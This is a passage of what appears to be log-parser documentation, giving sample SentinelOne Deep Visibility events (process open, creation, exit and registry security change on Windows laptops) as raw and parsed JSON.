\"valid\": {}}}, \"hashes\": {\"sha1\": \"fed4b4a753a9541389aa670c69e624be07569ccd\", \"sha256\": \"0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad\", \"md5\": \"564e4806ab18f93b93d551cd10c1598e\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"taskhostw.exe Install $(Arg0)\", \"fullPid\": {\"pid\": 15728, \"startTime\": {\"millisecondsSinceEpoch\": \"1631634711621\"}}, \"user\": {\"name\": \"CORP\\\\j.varinot\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6152\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"399C73C0494DC82C\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"92BFF1D465C6BF8D\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\system32\\\\svchost.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"57360\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": 
{}}}, \"hashes\": {\"sha1\": \"010db07461e45b41c886192df6fd425ba8d42d82\", \"sha256\": \"643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7\", \"md5\": \"f586835082f632dc8d9404d83bc16316\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\", \"fullPid\": {\"pid\": 1928, \"startTime\": {\"millisecondsSinceEpoch\": \"1630919463114\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"D382137395ABA2C4\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Services\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"4F9F0BD86D6CFE40\"}}, \"counters\": {\"modelChildProcess\": 1596, \"osChildProcess\": 1596, \"crossProcess\": 63, \"moduleLoad\": 81, \"crossProcessOutOfGroup\": 63, \"crossProcessOpenProcess\": 63}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Tasks\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 7, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"AB55C980E679578F\"}}, \"counters\": {\"moduleLoad\": 44}}, \"desiredAccess\": 5240, \"relations\": \"PR_OTHER\"}", - "event": { - "action": "openProcess", - "start": "2021-09-14T15:51:52.102000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 63, - "trace_id": "CEBBC94D38B041B1B2DE01C315EB28F5", - "uuid": "bcc4bf7a284441599707050e1d58a8dd" - }, - "event": { - "type": "openProcess" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - 
"cross_process": 5262, - "dns_lookups": 51, - "module_load": 222, - "net_conn_out": 1813 - }, - "desired_access": 5240, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\system32\\lsass.exe", - "node": { - "key": "1F70F08D24687577" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER" - } - }, - "size_bytes": "59448", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "2A2CC1C3468CB3D8" - }, - "parent": { - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\system32\\wininit.exe", - "node": { - "key": "E2ABEBDC5F08F279" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER" - } - }, - "size_bytes": "419432", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "611EAD3E998CF40A" - }, - "parent": { - "node": { - "key": "0D332A871A7DB912" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "5318E7F038459CED" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "relations": "PR_OTHER", - "root": "E_TRUE", - "target": { - "command_line": "taskhostw.exe Install $(Arg0)", - "counters": { - "module_load": 44 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\system32\\taskhostw.exe", - "node": { - "key": "23FF6C2F651EEA11" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "97096", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "hash": { - "md5": "564e4806ab18f93b93d551cd10c1598e", - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad" - }, 
- "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "name": "Host Process for Windows Tasks", - "node": { - "key": "E94742BA9CF1A186" - }, - "parent": { - "node": { - "key": "399C73C0494DC82C" - } - }, - "pid": 15728, - "root": "E_TRUE", - "session_id": 7, - "start": "2021-09-14T15:51:51.621000Z", - "true_context": { - "key": "AB55C980E679578F" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6152" - }, - "working_directory": "C:\\WINDOWS\\system32" - }, - "true_context": { - "key": "A2DC49811AF8CC72" - }, - "user": { - "sid": "S-1-5-18" - } - } - }, - "host": { - "name": "LAPTOP-TECH15", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "C:\\WINDOWS\\system32\\lsass.exe", - "executable": "C:\\WINDOWS\\system32\\lsass.exe", - "hash": { - "md5": "15a556def233f112d127025ab51ac2d3", - "sha1": "28f7fb54c7bcd9d6e71669ea5bddf72ea65311ce", - "sha256": "362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427" - }, - "name": "lsass.exe", - "parent": { - "command_line": "wininit.exe", - "hash": { - "md5": "9ef51c8ad595c5e2a123c06ad39fccd7", - "sha1": "915ea28bdaa9a2230ce52080693d7f7e27620ed5", - "sha256": "268ca325c8f12e68b6728ff24d6536030aab6e05603d0179033b1e51d8476d86" - }, - "name": "wininit.exe", - "pid": 900, - "title": "Windows Start-Up Application", - "working_directory": "C:\\WINDOWS\\system32" - }, - "pid": 992, - "start": "2021-09-06T09:11:02.523000Z", - "title": "Local Security Authority Process", - "working_directory": "C:\\WINDOWS\\system32" - }, - "related": { - "hash": [ - "15a556def233f112d127025ab51ac2d3", - "268ca325c8f12e68b6728ff24d6536030aab6e05603d0179033b1e51d8476d86", - "28f7fb54c7bcd9d6e71669ea5bddf72ea65311ce", - "362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427", - "915ea28bdaa9a2230ce52080693d7f7e27620ed5", - "9ef51c8ad595c5e2a123c06ad39fccd7" - ], - 
"user": [ - "AUTORITE NT\\Syst\u00e8me" - ] - }, - "user": { - "id": "S-1-5-18", - "name": "AUTORITE NT\\Syst\u00e8me" - } - } - - ``` - - -=== "process_creation.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 51, \"uuid\": \"19f22913365942f2afeed1463c96104b\", \"traceId\": \"620565A45ABA475FB419254BE2152CA4\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-COM11\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631630507153\"}, \"event_type\": \"processCreation\", \"trueContext\": {\"key\": {\"value\": \"03E80496A6DE3247\"}}, \"process\": {\"node\": {\"key\": {\"value\": \"F85B96F9DB3700A5\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"7543AA6F061EE014\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\System32\\\\taskhostw.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"97096\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"fed4b4a753a9541389aa670c69e624be07569ccd\", \"sha256\": \"0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad\", \"md5\": \"564e4806ab18f93b93d551cd10c1598e\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"taskhostw.exe Install $(Arg0)\", \"fullPid\": {\"pid\": 15104, \"startTime\": {\"millisecondsSinceEpoch\": \"1631630506706\"}}, \"user\": {\"name\": \"CORP\\\\l.maoui\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6168\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"BAA63DA271B07548\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Tasks\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 10, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", 
\"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"03E80496A6DE3247\"}}, \"counters\": {\"moduleLoad\": 44}}, \"parent\": {\"node\": {\"key\": {\"value\": \"BAA63DA271B07548\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"03708471A478DAC3\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\System32\\\\svchost.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"57360\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"010db07461e45b41c886192df6fd425ba8d42d82\", \"sha256\": \"643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7\", \"md5\": \"f586835082f632dc8d9404d83bc16316\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\", \"fullPid\": {\"pid\": 1900, \"startTime\": {\"millisecondsSinceEpoch\": \"1630857368855\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"C36E5F6CB1EFE1FA\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Services\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"A27D4C3AA2A4C77B\"}}, \"counters\": {\"modelChildProcess\": 2096, \"osChildProcess\": 2096, \"crossProcess\": 324, \"moduleLoad\": 80, \"crossProcessOutOfGroup\": 324, \"crossProcessOpenProcess\": 324}}, \"hashes\": {\"sha1\": \"fed4b4a753a9541389aa670c69e624be07569ccd\", \"sha256\": \"0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad\", \"md5\": \"564e4806ab18f93b93d551cd10c1598e\"}, \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}}", - "event": { - "action": 
"processCreation", - "start": "2021-09-14T14:41:47.153000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 51, - "trace_id": "620565A45ABA475FB419254BE2152CA4", - "uuid": "19f22913365942f2afeed1463c96104b" - }, - "event": { - "type": "processCreation" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "module_load": 44 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\System32\\taskhostw.exe", - "node": { - "key": "7543AA6F061EE014" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "97096", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "F85B96F9DB3700A5" - }, - "parent": { - "counters": { - "cross_process": 324, - "model_child_process": 2096, - "module_load": 80, - "os_child_process": 2096 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\System32\\svchost.exe", - "node": { - "key": "03708471A478DAC3" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER" - } - }, - "size_bytes": "57360", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "BAA63DA271B07548" - }, - "parent": { - "node": { - "key": "C36E5F6CB1EFE1FA" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "A27D4C3AA2A4C77B" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "root": "E_TRUE", - "session_id": 10, - "true_context": { - "key": "03E80496A6DE3247" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6168" - } - }, - "true_context": { 
- "key": "03E80496A6DE3247" - } - }, - "file": { - "hash": { - "md5": "564e4806ab18f93b93d551cd10c1598e", - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad" - } - }, - "host": { - "name": "LAPTOP-COM11", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "code_signature": { - "exists": true, - "subject_name": "MICROSOFT WINDOWS", - "valid": true - }, - "command_line": "taskhostw.exe Install $(Arg0)", - "executable": "C:\\Windows\\System32\\taskhostw.exe", - "hash": { - "md5": "564e4806ab18f93b93d551cd10c1598e", - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad" - }, - "name": "taskhostw.exe", - "parent": { - "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", - "executable": "C:\\Windows\\System32\\svchost.exe", - "hash": { - "md5": "f586835082f632dc8d9404d83bc16316", - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7" - }, - "name": "svchost.exe", - "pid": 1900, - "start": "2021-09-05T15:56:08.855000Z", - "title": "Host Process for Windows Services", - "working_directory": "C:\\Windows\\System32" - }, - "pid": 15104, - "start": "2021-09-14T14:41:46.706000Z", - "title": "Host Process for Windows Tasks", - "working_directory": "C:\\Windows\\System32" - }, - "related": { - "hash": [ - "010db07461e45b41c886192df6fd425ba8d42d82", - "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "564e4806ab18f93b93d551cd10c1598e", - "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "f586835082f632dc8d9404d83bc16316", - "fed4b4a753a9541389aa670c69e624be07569ccd" - ], - "user": [ - "CORP\\l.maoui" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6168", - "name": "CORP\\l.maoui" - } - } - - ``` - - -=== 
"process_exit.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 102, \"uuid\": \"e4fb82d7034d4d8983f8f9e103aa394b\", \"traceId\": \"AEA057B816964BDF82E0E2EC171B0C10\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19043\", \"computerName\": \"LAPTOP-COM08\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631634704684\"}, \"event_type\": \"processExit\", \"trueContext\": {\"key\": {\"value\": \"3B49B9603DFF38C9\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"03B4B5C3910B72FF\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"31E86945F742D096\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\System32\\\\wermgr.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"228680\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"573ad9af63a6a0ab9b209ece518fd582b54cfef5\", \"sha256\": \"1c09759dcd31fdc81bcd6685438d7efb34e0229f1096bfd57d41ecfe614d07dc\", \"md5\": \"f7991343cf02ed92cb59f394e8b89f1f\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload\", \"fullPid\": {\"pid\": 9876, \"startTime\": {\"millisecondsSinceEpoch\": \"1631634703718\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"6308FCA4876DA87C\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Windows Problem Reporting\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"3B49B9603DFF38C9\"}}, \"counters\": {\"moduleLoad\": 212}}, \"parent\": {\"node\": {\"key\": {\"value\": 
\"6308FCA4876DA87C\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"B10478282C996149\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\System32\\\\svchost.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"57360\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"010db07461e45b41c886192df6fd425ba8d42d82\", \"sha256\": \"643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7\", \"md5\": \"f586835082f632dc8d9404d83bc16316\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\", \"fullPid\": {\"pid\": 1744, \"startTime\": {\"millisecondsSinceEpoch\": \"1631022021170\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"6B6B39C296E3FD3D\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Services\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"D4ADBE51EE6EC2D0\"}}, \"counters\": {\"modelChildProcess\": 1095, \"osChildProcess\": 1095, \"crossProcess\": 39, \"moduleLoad\": 80, \"crossProcessOutOfGroup\": 39, \"crossProcessOpenProcess\": 39}}}", - "event": { - "action": "processExit", - "start": "2021-09-14T15:51:44.684000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 102, - "trace_id": "AEA057B816964BDF82E0E2EC171B0C10", - "uuid": "e4fb82d7034d4d8983f8f9e103aa394b" - }, - "event": { - "type": "processExit" - }, - "host": { - "os": { - "revision": "19043" - } - }, - "process": { - "counters": { - "module_load": 212 - }, - 
"excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\System32\\wermgr.exe", - "node": { - "key": "31E86945F742D096" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "228680", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "03B4B5C3910B72FF" - }, - "parent": { - "counters": { - "cross_process": 39, - "model_child_process": 1095, - "module_load": 80, - "os_child_process": 1095 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\System32\\svchost.exe", - "node": { - "key": "B10478282C996149" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER" - } - }, - "size_bytes": "57360", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "6308FCA4876DA87C" - }, - "parent": { - "node": { - "key": "6B6B39C296E3FD3D" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "D4ADBE51EE6EC2D0" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "3B49B9603DFF38C9" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "true_context": { - "key": "3B49B9603DFF38C9" - } - }, - "host": { - "name": "LAPTOP-COM08", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "C:\\WINDOWS\\system32\\wermgr.exe -upload", - "executable": "C:\\WINDOWS\\System32\\wermgr.exe", - "hash": { - "md5": "f7991343cf02ed92cb59f394e8b89f1f", - "sha1": "573ad9af63a6a0ab9b209ece518fd582b54cfef5", - "sha256": "1c09759dcd31fdc81bcd6685438d7efb34e0229f1096bfd57d41ecfe614d07dc" - }, - "name": "wermgr.exe", - "parent": { - "command_line": 
"C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule", - "executable": "C:\\WINDOWS\\System32\\svchost.exe", - "hash": { - "md5": "f586835082f632dc8d9404d83bc16316", - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7" - }, - "name": "svchost.exe", - "pid": 1744, - "start": "2021-09-07T13:40:21.170000Z", - "title": "Host Process for Windows Services", - "working_directory": "C:\\WINDOWS\\System32" - }, - "pid": 9876, - "start": "2021-09-14T15:51:43.718000Z", - "title": "Windows Problem Reporting", - "working_directory": "C:\\WINDOWS\\System32" - }, - "related": { - "hash": [ - "010db07461e45b41c886192df6fd425ba8d42d82", - "1c09759dcd31fdc81bcd6685438d7efb34e0229f1096bfd57d41ecfe614d07dc", - "573ad9af63a6a0ab9b209ece518fd582b54cfef5", - "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "f586835082f632dc8d9404d83bc16316", - "f7991343cf02ed92cb59f394e8b89f1f" - ], - "user": [ - "AUTORITE NT\\Syst\u00e8me" - ] - }, - "user": { - "id": "S-1-5-18", - "name": "AUTORITE NT\\Syst\u00e8me" - } - } - - ``` - - -=== "reg_key_security_changed.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 10, \"uuid\": \"bfd21e8929fd49768299fae02a0557a6\", \"traceId\": \"7892FB424053407899299D5319FEB9C5\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH19\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631785108303\"}, \"event_type\": \"regKeySecurityChanged\", \"trueContext\": {\"key\": {\"value\": \"D1A7307582B51DFF\"}}, \"regKey\": {\"key\": {}, \"path\": \"MACHINE\\\\BCD00000000\\\\Objects\\\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\\\Elements\\\\11000001\"}, \"securityInformation\": 4, \"source\": {\"node\": {\"key\": {\"value\": \"C02A3567256C6DE9\"}}, \"executable\": 
{\"node\": {\"key\": {\"value\": \"61D0DBC75EA434C4\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\system32\\\\taskhostw.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"97096\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"fed4b4a753a9541389aa670c69e624be07569ccd\", \"sha256\": \"0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad\", \"md5\": \"564e4806ab18f93b93d551cd10c1598e\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"taskhostw.exe\", \"fullPid\": {\"pid\": 25104, \"startTime\": {\"millisecondsSinceEpoch\": \"1631775524677\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6186\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"7A33A49AFDF1C571\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Tasks\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 15, \"integrityLevel\": \"HIGH\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"D1A7307582B51DFF\"}}, \"counters\": {\"moduleLoad\": 52}}}", - "event": { - "action": "regKeySecurityChanged", - "start": "2021-09-16T09:38:28.303000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 10, - "trace_id": "7892FB424053407899299D5319FEB9C5", - "uuid": "bfd21e8929fd49768299fae02a0557a6" - }, - "event": { - "type": "regKeySecurityChanged" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "module_load": 52 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\system32\\taskhostw.exe", - "node": { - "key": "61D0DBC75EA434C4" - }, - "signature": { - "signed": { - 
"identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "97096", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "HIGH", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "C02A3567256C6DE9" - }, - "parent": { - "node": { - "key": "7A33A49AFDF1C571" - } - }, - "root": "E_FALSE", - "session_id": 15, - "true_context": { - "key": "D1A7307582B51DFF" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6186" - } - }, - "registry": { - "security_information": 4 - }, - "true_context": { - "key": "D1A7307582B51DFF" - } - }, - "host": { - "name": "LAPTOP-TECH19", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "taskhostw.exe", - "executable": "C:\\Windows\\system32\\taskhostw.exe", - "hash": { - "md5": "564e4806ab18f93b93d551cd10c1598e", - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad" - }, - "name": "taskhostw.exe", - "pid": 25104, - "start": "2021-09-16T06:58:44.677000Z", - "title": "Host Process for Windows Tasks", - "working_directory": "C:\\Windows\\system32" - }, - "registry": { - "path": "MACHINE\\BCD00000000\\Objects\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\Elements\\11000001", - "value": "11000001" - }, - "related": { - "hash": [ - "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "564e4806ab18f93b93d551cd10c1598e", - "fed4b4a753a9541389aa670c69e624be07569ccd" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6186", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "reg_value_create.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 10, \"uuid\": \"bfd21e8929fd49768299fae02a0557a6\", \"traceId\": \"7892FB424053407899299D5319FEB9C5\", 